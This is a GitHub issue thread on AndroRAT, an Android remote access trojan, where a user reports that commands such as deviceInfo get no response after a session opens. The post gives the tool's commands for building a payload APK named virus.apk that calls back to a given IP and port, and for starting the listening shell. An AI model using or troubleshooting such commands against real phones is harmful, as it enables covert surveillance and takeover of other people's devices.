### ISSUE TITLE
Commands not working/launching

### ISSUE THREAD

**Issue by P-SamiDev-Y** [karma9874/AndroRAT#229]
Hello folks!

I just sent a payload to my Android test phone using `python3 androRAT.py --build -i x.x.x.x -p 4444 -o virus.apk` and from another terminal I launched the command `python3 androRAT.py --shell -i 0.0.0.0 -p 4444`.

I successfully got a connection from my phone to the interpreter and a session opened, but once I try to execute a simple command like `deviceInfo` but I get no response from the interpreter.

![Screenshot_2022-09-28_20-52-59](https://user-images.githubusercontent.com/73015114/192878811-420effd8-078b-4ee7-82e5-8cf83502c8df.png)

I waited 10 minutes but nothing was happening.

**Does anyone knows the solution for this issue ?**

Thanks!
SamiDev.

**Comment by JRWinthenet** [comment]
same

**Comment by coco4ttv** [comment]
Same

**Comment by coco4ttv** [comment]
Have you figured out how to fix it
